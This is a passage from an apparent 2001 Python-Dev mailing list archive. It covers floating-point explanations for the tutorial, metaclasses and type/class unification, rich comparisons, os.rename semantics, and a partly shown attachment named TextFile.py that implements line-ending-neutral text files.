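A rough Python sketch of that idea, under stated assumptions: a dict stands in for sys.modules, `cached_import` and its `loader` callable are hypothetical, the loader is assumed to return a non-None object, and circular imports are not handled (a module importing itself would wait forever). Already-loaded modules come back with no locking at all; the marker only matters while a load is in progress.

```python
import threading

_LOADING = object()              # marker: "being loaded by another thread"
_modules = {}                    # stand-in for sys.modules
_lock = threading.Lock()
_done = threading.Condition(_lock)


def cached_import(name, loader):
    """Return the module for `name`, calling `loader()` at most once."""
    mod = _modules.get(name)
    if mod is not None and mod is not _LOADING:
        return mod               # fast path: already loaded, no lock taken
    with _lock:
        # Another thread is loading it: wait rather than load it twice.
        while _modules.get(name) is _LOADING:
            _done.wait()
        mod = _modules.get(name)
        if mod is not None:
            return mod
        _modules[name] = _LOADING    # claim the load for this thread
    try:
        mod = loader()               # run the slow part without the lock
    except BaseException:
        with _lock:
            del _modules[name]       # let a later caller retry
            _done.notify_all()
        raise
    with _lock:
        _modules[name] = mod
        _done.notify_all()
    return mod
```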

Jeremy


From tim@digicool.com  Tue May 22 00:20:16 2001
From: tim@digicool.com (Tim Peters)
Date: Mon, 21 May 2001 19:20:16 -0400
Subject: [Python-Dev] test_mailbox now fails on Windows
Message-ID: <BIEJKCLHCIOIHAGOKOLHIEJGCAAA.tim@digicool.com>

Appears to be because new code uses os.link, which doesn't exist on Windows.

BTW, test_urllib2.py is still failing on Windows (and has been for a couple
of weeks).


From michel@digicool.com  Tue May 22 00:42:49 2001
From: michel@digicool.com (Michel Pelletier)
Date: Mon, 21 May 2001 16:42:49 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPIEILDNAA.MarkH@ActiveState.com>
Message-ID: <Pine.LNX.4.21.0105211629210.19496-100000@localhost.localdomain>

On Tue, 22 May 2001, Mark Hammond wrote:

> > > + Happy to add text explaining the existence of surprises, and
> > >   providing a URL.  Do the floating-point morons <wink> on Python-Dev
> > >   find this one comprehensible?:
> 
> Hey - I resemble that remark!

As they say in the south, "mah-self"

> > >     http://www.lahey.com/float.htm
> 
> I quite liked the tone of this note.  The Python-dev morons probably could
> make good sense of this, but only due to the relentless persistence of a
> certain timbot.

I liked the tone too, but it really goes into a lot of detail, there's
this problem, and that one, oh and also *this* one and then there's *that*
and the other thing, and after a while you get the impression that
floating-point is for the insane.

> If not for Tim, I would have forgotten completely about binary floating
> point versus decimal floating point.  IIRC, me and about 40 other guys were
> desperately trying to get the attention of the single CS female on the day
> that lecture was given.  (Actually, that is a pretty safe bet - _all_
> lectures were spent that way :)

<sidetrack> 
The funny thing about that is we were in *Long Beach* (I
assume you mean IPC9), if you wanted to see beautiful, scarcely clothed
women in an acceptable public venue you wouldn't have had to go far, and
they would have probably had more interesting "significant bits" (it's
none of anyone's business where *I* was during the lectures ;).

Someone on the Zope list proposed P4W (Python for Women).  Poor, desperate
souls.  Obviously, P4E includes them too!!
</sidetrack>

> > I was thinking more of immortalizing this one:
> >
> > http://www.python.org/cgi-bin/moinmoin/RepresentationError
> 
> IMO, this is a little worse.

I agree.  Equations should not be needed to explain this.

-Michel


From MarkH@ActiveState.com  Tue May 22 00:47:06 2001
From: MarkH@ActiveState.com (Mark Hammond)
Date: Tue, 22 May 2001 09:47:06 +1000
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105211629210.19496-100000@localhost.localdomain>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEIMDNAA.MarkH@ActiveState.com>

> <sidetrack>
> The funny thing about that is we were in *Long Beach* (I
> assume you mean IPC9), if you wanted to see beautiful, scarcely clothed

Actually, I meant the computer science lectures all those years ago.
Literally one female.

And-not-much-has-changed ly,

Mark.


From guido@digicool.com  Tue May 22 04:22:40 2001
From: guido@digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 23:22:40 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Tue, 22 May 2001 10:06:54 +1000."
 <B43D149A9AB2D411971300B0D03D7E8B90B70A@natasha.auslabs.avaya.com>
References: <B43D149A9AB2D411971300B0D03D7E8B90B70A@natasha.auslabs.avaya.com>
Message-ID: <200105220322.XAA13468@cj20424-a.reston1.va.home.com>

Hi Alan,

Thanks a lot for your input.  I am cc'ing this reply to python-dev
because I think my reply will be interesting for others.
(Python-dev'ers: Alan expressed concern that introducing Smalltalk
metaclasses would make Python unnecessarily complicated.)


The way my thinking is currently going, it's not likely that Python
will get a metaclass system similar to Smalltalk.  However, unifying
types and classes is useful for other reasons: please go to
http://python.sourceforge.net/peps/ to read PEP 252 which explains how
introspection can become simpler and more powerful by unifying the
introspection mechanisms for types and classes.

There will still be metaclasses, but the metaclasses will be less
important than in Smalltalk.  Class methods as commonly seen in
Smalltalk are not high on my priority list, and the metaclass
hierarchy won't be parallelling the regular class hierarchy.  Instead,
most metaclass programming will be done in C by programmers who want
to implement alternative class policies.

For example, the current class implementation gives each class a
__dict__ for methods and class variables, and dynamically searches the
class hierarchy for methods.  An alternative inheritance policy could
merge the __dict__ of the base class(es) with the __dict__ of the
derived class at class declaration time: this would make method lookup
a single dict lookup no matter how many levels of base classes are
involved, at the cost of making classes less dynamic, because a change
to a base class won't be seen in a derived class.  A metaclass
controls method lookup and class construction, and thus a different
metaclass can be used to change this policy for selected class
hierarchies without changing the default policy (which would be
backwards incompatible).
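The merge-at-declaration-time policy can be sketched in pure Python. This sketch assumes modern Python 3 syntax; the metaclass= keyword did not exist in this form in 2001. FlattenedMeta is a hypothetical name. The sketch only illustrates the trade-off described above. It is not how any real metaclass was implemented.

```python
class FlattenedMeta(type):
    """Hypothetical metaclass: copy inherited attributes into the new
    class's own __dict__ at class creation time, so a method lookup
    is a single dict probe on the class itself."""

    def __new__(mcls, name, bases, namespace):
        cls = super().__new__(mcls, name, bases, namespace)
        # Walk ancestors from most distant to nearest, so nearer
        # definitions overwrite more distant ones (MRO priority).
        for klass in reversed(cls.__mro__[1:]):
            if klass is object:
                continue
            for key, value in vars(klass).items():
                # Skip special attributes such as __module__ and __dict__,
                # and never override names defined in this class body.
                if key.startswith("__") and key.endswith("__"):
                    continue
                if key not in namespace:
                    setattr(cls, key, value)
        return cls


class Base:
    def greet(self):
        return "base"


class Derived(Base, metaclass=FlattenedMeta):
    pass


copied = "greet" in vars(Derived)      # the method now lives in Derived.__dict__
Base.greet = lambda self: "changed"    # a later change to the base class...
print(Derived().greet())               # ...is not seen: prints "base"
print(Base().greet())                  # prints "changed"
```

The final two lines show the cost Guido mentions. Derived keeps its own copy of greet, so it no longer follows changes made to Base.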

Other policies under control of a metaclass could include overriding
hooks for getattr and setattr, alternative mechanisms to store
instance variables (e.g. slot-based rather than dict-based), and so
on.
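Slot-based instance storage is one such policy. Later Python versions expose it to ordinary Python code through __slots__. Here is a minimal sketch, assuming a modern Python; Point is just an illustrative name:

```python
class Point:
    # Instance variables live in fixed slots, not in a per-instance __dict__.
    __slots__ = ("x", "y")

    def __init__(self, x, y):
        self.x = x
        self.y = y


p = Point(1, 2)
has_dict = hasattr(p, "__dict__")   # False: no per-instance dict is created
try:
    p.z = 3                         # there is no slot named "z"
    rejected = False
except AttributeError:
    rejected = True
print(has_dict, rejected)           # prints "False True"
```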

While I think I can make it possible to write metaclasses in pure
Python (by subclassing types.TypeType), I expect that most
metaprogramming will be done in C, for performance reasons and for
maximum flexibility.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Tue May 22 04:55:26 2001
From: guido@digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 23:55:26 -0400
Subject: [Python-Dev] RE: Rich comparison of lists and tuples
In-Reply-To: Your message of "Mon, 21 May 2001 03:53:24 EDT."
 <LNBBLJKPBEHFEDALKOLCIEHFKDAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCIEHFKDAA.tim.one@home.com>
Message-ID: <200105220355.XAA13678@cj20424-a.reston1.va.home.com>

> [Guido]
> > I would like to break this down by defining the mapping between cmp()
> > and rich comparisons.

[Tim]
> Good idea!

Followed by many nitpicking questions about what I meant.  As a matter
of process, I think it's better to try to channel instead of challenge
me.  I just don't seem to have the concentration necessary to come up
with all the details needed to make this worthy of a language
definition, and you do.

If you want a BDFL proclamation on currently gray areas in the rules,
or a reversal of what the current implementation does in some cases,
please draft a definition with a few leading questions.
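For reference, here is a small sketch of one such mapping in modern Python. It derives a three-way cmp() result from rich comparisons. It also shows the lexicographic rule CPython applies to lists and tuples: find the first pair of items that are not equal and let that pair decide, otherwise compare lengths. The function names are hypothetical. The sketch also ignores implementation shortcuts, such as treating identical objects as equal.

```python
import operator


def cmp_via_rich(a, b):
    """Three-way comparison built from rich comparisons: -1, 0 or 1."""
    return (a > b) - (a < b)


def seq_richcompare(a, b, op):
    """Lexicographic rich comparison of two sequences using operator op."""
    for x, y in zip(a, b):
        if not x == y:
            # The first pair of unequal items decides the result.
            return op(x, y)
    # All shared items are equal: compare lengths, so the shorter is smaller.
    return op(len(a), len(b))


print(cmp_via_rich(1, 2))                                # -1
print(seq_richcompare([1, 2], [1, 3], operator.lt))      # True
print(seq_richcompare((1, 2), (1, 2, 0), operator.lt))   # True
```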

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Tue May 22 05:02:18 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 22 May 2001 00:02:18 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPIEILDNAA.MarkH@ActiveState.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEKGKDAA.tim.one@home.com>

[Mark Hammond, on http://www.lahey.com/float.htm]

> I quite liked the tone of this note.  The Python-dev morons probably could
> make good sense of this, but only due to the relentless persistence of a
> certain timbot.
>
> If not for Tim, I would have forgotten completely about binary floating
> point versus decimal floating point.  IIRC, me and about 40 other guys
> were desperately trying to get the attention of the single CS female on
> the day that lecture was given.  (Actually, that is a pretty safe bet -
> _all_ lectures were spent that way :)

I remember guys like you.  Well guess what?  You ended up with a baby, while
I'm known on two continents as the author of tabnanny.py.  Ha!  Revenge is a
dish best eaten cold <burp>.

> However, without a little additional background I doubt the masses would
> be able to get too far into this.

There's only so much you can say to unmotivated people who are also unwilling
to learn.  That's not my problem.  Finding them a gentle intro from which
they *could* learn isn't either, but typing a URL is easy enough that I don't
mind.

Here:  I want to script MS Word with Python.  I don't know COM and refuse to
learn anything about it.  I'd rather not install win32all either, and import
statements confuse me.  Why don't you make it easy for me?  It's the same
thing -- you can point them at what they need to learn if they're serious,
else they're simply out of luck.

[And on]
>> http://www.python.org/cgi-bin/moinmoin/RepresentationError
>
> IMO, this is a little worse.

In one sense it's much worse:  it's only trying to explain a single cause of
fp surprises.  OTOH, it explains it precisely while giving the reader the
tools needed to do an exact analysis of any case of that particular class.
The Lahey link touches on all the common sources of surprises, but leaves
them fuzzy.

> There is less "background".  Eg, in almost the first paragraph we see:
>
> """
> Rewriting
>     1        J
>    ---  ~= ----
>    10      2**N
> """
>
> And I went "huh?  Where did j and N spring from?".  Reading a bit further
> made it clear, but this document did seem a little impenetrable to
> floating point or maths newbies.

It did its job for them if it simply scared them <0.5 wink>.

> It seems to me that the RepresentationError document was written for
> people with a decent background in maths -

There's nothing more complicated than integer division there.
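To make the integer-division claim concrete, here is a sketch that finds J and N for a positive ratio such as 1/10. It assumes IEEE-754 doubles with 53 significant bits. nearest_binary_fraction is a hypothetical helper. It ignores the corner case where rounding up carries J to 2**53.

```python
from fractions import Fraction


def nearest_binary_fraction(num, den, bits=53):
    """Return (J, N) such that J / 2**N is the closest value to num/den
    with J having exactly `bits` bits (2**(bits-1) <= J < 2**bits)."""
    # Grow N until the integer quotient has the required number of bits.
    N = 0
    while (num << N) // den < 2 ** (bits - 1):
        N += 1
    J, remainder = divmod(num << N, den)
    # Round to nearest, ties to even, as IEEE-754 does by default.
    if 2 * remainder > den or (2 * remainder == den and J % 2 == 1):
        J += 1
    return J, N


J, N = nearest_binary_fraction(1, 10)
print(J, N)                                   # 7205759403792794 56
print(Fraction(J, 2 ** N) == Fraction(0.1))   # True: the double stored for 0.1
```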

> exactly the sort of people who _don't_ need such a document.

They actually do:  regardless of math background, nothing about f.p. is
obvious before studying f.p. as a subject in its own right.  It's "not like"
anything else, and in previous lives I spent a good chunk of my work time
explaining the same stuff to doctorates.  Mathematicians were actually the
hardest audience at first, perhaps because they had the hardest time
admitting they didn't already understand it; after getting beyond bruised
professional pride, though, they were the easiest audience to bring up to
speed.


From tim@digicool.com  Tue May 22 05:58:21 2001
From: tim@digicool.com (Tim Peters)
Date: Tue, 22 May 2001 00:58:21 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105211629210.19496-100000@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEKIKDAA.tim@digicool.com>

[Michel Pelletier, on http://www.lahey.com/float.htm]
> I liked the tone too, but it really goes into a lot of detail, there's
> this problem, and that one, oh and also *this* one and then there's
> *that* and the other thing, and after a while you get the impression
> that floating-point is for the insane.

Using an unfamiliar power tool with sharp edges, and while blindfolded, is
insane.

[and on http://www.python.org/cgi-bin/moinmoin/RepresentationError]

> I agree.  Equations should not be needed to explain this.

There's exactly one equation on that page, saying that one ratio of two
integers is approximately equal to another ratio of two integers.  If that's
too much for you, and you weren't satisfied with the *initial* hand-wavy
explanation ("1/10 is not exactly representable as a binary fraction")
either, then it's up to you to do better than the latter without actually
saying anything useful <wink>:

Q:  Why is Python broken:

    >>> 0.1
    0.10000000000000001

A:  [your turn]
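Here is one way to see what that output shows, as a sketch in modern Python. The decimal module can display the exact value of the double nearest 0.1. Formatting with 17 significant digits, as the repr of that era did, reproduces the digits above. Python versions since 2.7 and 3.1 use the shortest repr that round-trips, so a current interpreter echoes plain 0.1.

```python
from decimal import Decimal

x = 0.1
exact = Decimal(x)          # exact binary value stored for the literal 0.1
seventeen = "%.17g" % x     # 17 significant digits, as the 2001-era repr used
shortest = repr(x)          # modern repr: shortest string that round-trips

print(exact)      # 0.1000000000000000055511151231257827021181583404541015625
print(seventeen)  # 0.10000000000000001
print(shortest)   # 0.1
```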


From gward@python.net  Tue May 22 14:41:57 2001
From: gward@python.net (Greg Ward)
Date: Tue, 22 May 2001 09:41:57 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com>; from tim@digicool.com on Mon, May 21, 2001 at 05:57:22PM -0400
References: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com>
Message-ID: <20010522094157.A1245@gerg.ca>

On 21 May 2001, Tim Peters said:
> + Happy to add text explaining the existence of surprises, and
>   providing a URL.  Do the floating-point morons <wink> on Python-Dev
>   find this one comprehensible?:
> 
>     http://www.lahey.com/float.htm

I found this article more useful, interesting, and informative than
whatever I learned about binary floating-point in my academic years.
Good link, Tim.  Two catches:

  * I can just barely follow the FORTRAN examples; I very much doubt
    the average Python newbie would have any more luck than me

  * I tried several of the FORTRAN examples in Python, and did not
    witness any of the gotchas they are meant to illustrate.  Possibly
    it's just a single-precision vs. double-precision difference, but
    Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2
    doesn't demonstrate the same gotchas as that article does.
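The single- vs. double-precision guess is easy to probe, because Python floats are C doubles. Here is a sketch that rounds a value through IEEE-754 single precision with the standard struct module; the helper name to_single is hypothetical:

```python
import struct


def to_single(x):
    """Round a Python float (a C double) to the nearest IEEE-754 single."""
    return struct.unpack("f", struct.pack("f", x))[0]


single = to_single(0.1)
print(single)              # 0.10000000149011612
print(abs(single - 0.1))   # about 1.5e-09, versus about 5.6e-18 for the double
```

The single-precision error is roughly a billion times larger. That fits the idea that the article's gotchas appear far sooner in REAL*4 code than in Python's doubles.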

        Greg
-- 
Greg Ward - geek                                        gward@python.net
http://starship.python.net/~gward/
Ban the bomb -- save the world for conventional warfare.


From skip@pobox.com (Skip Montanaro)  Tue May 22 17:01:40 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Tue, 22 May 2001 11:01:40 -0500
Subject: [Python-Dev] type/class unification and ExtensionClass
Message-ID: <15114.36196.4677.99240@beluga.mojam.com>

I know Guido has recently been working on some of the type/class unification
issues (PEPs 252 and 253).  Will this affect ExtensionClass?  In particular,
will it go away or have to be reworked significantly for Python 2.2 or 2.3?
The new PyGtk wrappers use the ExtensionClass module.  I'm curious about how
hard it would be to move away from ExtensionClass for these wrappers.  My
reading of PEP 253 suggests this shouldn't be too difficult.

I'd ask Guido directly, but I figure other people on this list might also
have useful input on the issue and/or be able to answer, saving him the
time.  At any rate, he will see it posted here just the same.

Thx,

Skip


From guido@digicool.com  Tue May 22 17:23:52 2001
From: guido@digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 12:23:52 -0400
Subject: [Python-Dev] type/class unification and ExtensionClass
In-Reply-To: Your message of "Tue, 22 May 2001 11:01:40 CDT."
 <15114.36196.4677.99240@beluga.mojam.com>
References: <15114.36196.4677.99240@beluga.mojam.com>
Message-ID: <200105221623.f4MGNqC02110@odiug.digicool.com>

> I know Guido has recently been working on some of the type/class unification
> issues (PEPs 252 and 253).

And I'm not done yet. :-)

> Will this affect ExtensionClass?  In particular,
> will it go away or have to be reworked significantly for Python 2.2 or 2.3?

Probably.  Jim Fulton in particular asked me to work on this because
he wants to phase out ExtensionClass.

> The new PyGtk wrappers use the ExtensionClass module.  I'm curious about how
> hard it would be to move away from ExtensionClass for these wrappers.  My
> reading of PEP 253 suggests this shouldn't be too difficult.

I don't think so either.

> I'd ask Guido directly, but I figure other people on this list might also
> have useful input on the issue and/or be able to answer, saving him the
> time.  At any rate, he will see it posted here just the same.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From michel@digicool.com  Tue May 22 22:44:09 2001
From: michel@digicool.com (Michel Pelletier)
Date: Tue, 22 May 2001 14:44:09 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LNBBLJKPBEHFEDALKOLCMEKIKDAA.tim@digicool.com>
Message-ID: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>

On Tue, 22 May 2001, Tim Peters wrote:

> [Michel Pelletier, on http://www.lahey.com/float.htm]
> > I liked the tone too, but it really goes into a lot of detail, there's
> > this problem, and that one, oh and also *this* one and then there's
> > *that* and the other thing, and after a while you get the impression
> > that floating-point is for the insane.
> 
> Using an unfamiliar power tool with sharp edges, and while blindfolded, is
> insane.

I should have been more clear, I liked the first couple of paragraphs for
their descriptions, and there is certainly nothing wrong with the document
as it stands, but such an explanation would be a bit too lengthy and
boring to a typical fifth grader or photoshop guru going through the
Tutorial and dabbling in programming for the very first time.

> [and on http://www.python.org/cgi-bin/moinmoin/RepresentationError]
> 
> > I agree.  Equations should not be needed to explain this.
> 
> There's exactly one equation on that page, saying that one ratio of two
> integers is approximately equal to another ratio of two integers.

Who was it that said every equation will halve your audience?  I agree
with that, the tutorial should try to be as broad and simple as possible.

> If that's
> too much for you, and you weren't satisfied with the *initial* hand-wavy
> explanation ("1/10 is not exactly representable as a binary fraction")
> either, then it's up to you to do better than the latter without actually
> saying anything useful <wink>:

The latter is fine, although I think the first document hand-waves better.  

-Michel


From skip@pobox.com (Skip Montanaro)  Tue May 22 22:54:42 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Tue, 22 May 2001 16:54:42 -0500
Subject: [Python-Dev] unifying os.rename semantics across platform
Message-ID: <15114.57378.887742.531145@beluga.mojam.com>

Couldn't figure out why this message never generated any comment.  Turns out
it didn't reach the list because the host I sent it from
(dynamic4.tttech.com) couldn't be resolved.  I just noticed it in my errors
mailbox and am sending it out again.

------------------------------------------------------------------------------
It was brought to my attention a week ago by a client that os.rename
semantics differ between Unix and Windows.  On Unix, if the destination file
already exists it is silently deleted.  On Windows, an exception is raised.
I was able to verify this for Python 2.0 on Windows98.  I assume nothing
changed for 2.1, but I can't verify that.  (Windows trashed my partition
table and my Linux root partition while I was downloading 2.1.
Consequently, I no longer run Windows.  Take that, Bill...)  I haven't
checked the Mac yet (will do that when I get back to the US), but I think
that os.rename should have the same semantics across all platforms.  To the
extent reasonably possible, I think this should also be true of other common
functions exposed through the os module.
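A small probe can check the difference described here on any given platform. This is a sketch in modern Python, and rename_onto_existing is a hypothetical helper. On Windows the failure appears as an OSError subclass (FileExistsError in current versions), which is what the probe catches:

```python
import os
import tempfile


def rename_onto_existing():
    """Report what os.rename does when the destination file already exists."""
    with tempfile.TemporaryDirectory() as d:
        src = os.path.join(d, "src.txt")
        dst = os.path.join(d, "dst.txt")
        for path, text in ((src, "new"), (dst, "old")):
            with open(path, "w") as f:
                f.write(text)
        try:
            os.rename(src, dst)
        except OSError:
            # Windows behaviour: an existing destination makes the call fail.
            return "raised"
        with open(dst) as f:
            # POSIX behaviour: the destination is silently replaced.
            return "replaced" if f.read() == "new" else "unexpected"


print(rename_onto_existing())
```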

On the (unsupportable) theory that to-date, more Python apps have been
written and/or deployed on Unix-like systems and that where Windows apps are
concerned, many developers will have added a thin wrapper to mimic the Unix
semantics, I think less breakage would result if the Unix semantics were
implemented in the Windows version.  It appears that is what POSIX
compliance would demand as well.

Skip


From fdrake@acm.org  Tue May 22 22:55:29 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Tue, 22 May 2001 17:55:29 -0400 (EDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
References: <LNBBLJKPBEHFEDALKOLCMEKIKDAA.tim@digicool.com>
 <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
Message-ID: <15114.57425.540688.205255@cj42289-a.reston1.va.home.com>

Michel Pelletier writes:
 > as it stands, but such an explanation would be a bit too lengthy and
 > boring to a typical fifth grader or photoshop guru going through the
 > Tutorial and dabbling in programming for the very first time.

  But that's not the audience the Python Tutorial is targeted to --
readers are expected to be essentially competent in at least one "3rd
generation" language.  Maybe a few will shy away from a simple
equation, but not so many.  Those who do would do well to shy away
from FP as well.  ;-)


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake@acm.org  Tue May 22 23:04:11 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Tue, 22 May 2001 18:04:11 -0400 (EDT)
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <15114.57378.887742.531145@beluga.mojam.com>
References: <15114.57378.887742.531145@beluga.mojam.com>
Message-ID: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com>

skip@pobox.com writes:
 > On the (unsupportable) theory that to-date, more Python apps have been
 > written and/or deployed on Unix-like systems and that where Windows apps are
 > concerned, many developers will have added a thin wrapper to mimic the Unix
 > semantics, I think less breakage would result if the Unix semantics were

  I don't know whether there are more deployed Python apps on Unix
than on Windows (and I've no good idea about how to find out), but I
think unifying the semantics one way or the other is a good thing.
Regardless of which set of semantics is chosen.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From mwh@python.net  Tue May 22 23:07:12 2001
From: mwh@python.net (Michael Hudson)
Date: 22 May 2001 23:07:12 +0100
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Michel Pelletier's message of "Tue, 22 May 2001 14:44:09 -0700 (PDT)"
References: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
Message-ID: <m33d9xkpgv.fsf@atrus.jesus.cam.ac.uk>

Michel Pelletier <michel@digicool.com> writes:

> Who was it that said every equation will halve your audience?

It was Stephen Hawking's editor when he was preparing A Brief History
Of Time (or at least, it gets mentioned in the preface; the advice may
be older).

Cheers,
M.

-- 
7. It is easier to write an incorrect program than understand a
   correct one.
  -- Alan Perlis, http://www.cs.yale.edu/homes/perlis-alan/quotes.html


From jeremy@digicool.com  Tue May 22 23:57:40 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Tue, 22 May 2001 18:57:40 -0400 (EDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <m33d9xkpgv.fsf@atrus.jesus.cam.ac.uk>
References: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
 <m33d9xkpgv.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <15114.61156.692322.674137@slothrop.digicool.com>

>>>>> "MWH" == Michael Hudson <mwh@python.net> writes:

  MWH> Michel Pelletier <michel@digicool.com> writes:
  >> Who was it that said every equation will halve your audience?

  MWH> It was Stephen Hawking's editor when he was preparing A Brief
  MWH> History Of Time (or at least, it gets mentioned in the preface;
  MWH> the advice may be older).

There's a similar saw about excerpts of books in foreign languages.  I
believe I first read it in reference to Umberto Eco's Foucault's
Pendulum, which starts with a full page of Hebrew.

Jeremy


From chrishbarker@home.net  Wed May 23 00:21:01 2001
From: chrishbarker@home.net (Chris Barker)
Date: Tue, 22 May 2001 16:21:01 -0700
Subject: [Pythonmac-SIG] Re: [Python-Dev] Import hook to do end-of-line
 conversion?
References: <20010414192445-r01010600-f8273ce6@213.84.27.177>
Message-ID: <3B0AF45D.732126E6@home.net>

This is a multi-part message in MIME format.
--------------B9643430766B782E71A5BE98
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Just van Rossum wrote:

> Agreed. I'll try to write one, once I'm feeling better: having the flu doesn't
> seem to help focussing on actual content...
> 
> Just

Just (or anyone else)

Have you made any progress on this PEP? I'd like to see it happen, so if
you haven't done it, I'll try to find the time to make a start on it
myself.

I have written a simple class that implements a line-ending-neutral text
file. I wrote it because I have a need for it, and I thought it
would be a reasonable prototype for any syntax and methods we might want
to use in an actual implementation. I doubt anyone would find the
methods I used particularly clean or elegant (or fast) but it's the
first thing I've come up with, and it seems to work.
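For comparison, later versions of Python build this behaviour into the io layer as "universal newlines". With newline=None, input lines ending in "\r\n", "\r" or "\n" all come back as "\n". On output, a given newline string replaces every "\n" written. Here is a sketch in modern Python over in-memory bytes, roughly matching the class's read side and its LineEndingType option. The helper names are hypothetical.

```python
import io


def read_universal(data):
    """Split bytes with any mix of DOS, Mac and Unix endings into lines."""
    text = io.TextIOWrapper(io.BytesIO(data), encoding="ascii", newline=None)
    return text.readlines()   # every line ending is translated to "\n"


def write_with_ending(text, line_ending):
    """Encode text, translating each newline into the requested ending."""
    raw = io.BytesIO()
    out = io.TextIOWrapper(raw, encoding="ascii", newline=line_ending)
    out.write(text)
    out.flush()               # push the buffered text down into raw
    return raw.getvalue()


print(read_universal(b"dos\r\nmac\runix\nlast"))  # ['dos\n', 'mac\n', 'unix\n', 'last']
print(write_with_ending("a\nb\n", "\r\n"))        # b'a\r\nb\r\n'
```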

I've enclosed the module with this email. If that doesn't work, let me
know and I'll put it on a website.

-Chris

-- 
Christopher Barker,
Ph.D.                                                           
ChrisHBarker@home.net                 ---           ---           ---
http://members.home.net/barkerlohmann ---@@       -----@@       -----@@
                                   ------@@@     ------@@@     ------@@@
Oil Spill Modeling                ------   @    ------   @   ------   @
Water Resources Engineering       -------      ---------     --------    
Coastal and Fluvial Hydrodynamics --------------------------------------
------------------------------------------------------------------------
--------------B9643430766B782E71A5BE98
Content-Type: text/plain; charset=us-ascii;
 name="TextFile.py"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="TextFile.py"

#!/usr/bin/env python

"""

TextFile.py : a module that provides a UniversalTextFile class, and a
replacement for the native python "open" command that provides an
interface to that class.

It would usually be used as:

from TextFile import open

then you can use the new open just like the old one (with some added flags and arguments)

or

import TextFile

file = TextFile.open(filename,flags,[bufsize], [LineEndingType], [LineBufferSize])


"""
import os

## Re-map the open function
_OrigOpen = open

def open(filename,flags = "",bufsize = -1, LineEndingType = "", LineBufferSize = ""):
    """
    
    A new open function, that returns a regular python file object for
    the old calls, and returns a new nifty universal text file when
    required.

    This works just like the regular open command, except that a new
    flag ("t") and two new parameters (LineEndingType and
    LineBufferSize) have been added.

    Call:

    file = open(filename,flags = "",bufsize = -1, LineEndingType = "", LineBufferSize = "")
    - filename is the name of the file to be opened
    - flags is a string of one letter flags, the same as the standard open
      command, plus a "t" for universal text file.
    - - "b" means binary file, this returns the standard binary file object
    - - "t" means universal text file
    - - "r" for read only
    - - "w" for write. If there are both "w" and "t", then the user can
        specify a line ending type to be used with the LineEndingType
        parameter.
    - - "a" means append to existing file

    - bufsize specifies the buffer size to be used by the system. Same
      as the regular open function

    - LineEndingType is used only for writing (and appending) files, to specify a
      non-native line ending to be written.
    - - The options are: "native", "DOS", "Posix", "Unix", "Mac", or the
        characters themselves( "\r\n", etc. ). "native" will result in
        using the standard file object, which uses whatever is native
        for the system that python is running on.

    - LineBufferSize is the size of the buffer used to read data in
    a readline() operation. The default is currently set to 100
    characters. If you will be reading files with many lines over 100
    characters long, you should set this number to the largest expected
    line length.

    
    """

    if "t" in flags: # this is a universal text file
        if ("w" in flags or "a" in flags) and LineEndingType == "native":
            return _OrigOpen(filename,flags.replace("t",""), bufsize)
        return UniversalTextFile(filename,flags,LineEndingType,LineBufferSize)
    else: # this is a regular old file
        return _OrigOpen(filename,flags,bufsize)
    
    
class UniversalTextFile:
    """
    
    A class that acts just like a python file object, but has a mode
    that allows the reading of arbitrarily formatted text files, i.e. with
    either Unix, DOS or Mac line endings. [\n , \r\n, or \r]

    To keep it truly universal, it checks for each of these line ending
    possibilities at every line, so it should work on a file with mixed
    endings as well.

    """
    def __init__(self,filename,flags = "",LineEndingType = "native",LineBufferSize = ""):
        self._file = _OrigOpen(filename,flags.replace("t","")+"b")

        LineEndingType = LineEndingType.lower()
        if LineEndingType in ("", "native"): # open() passes "" by default
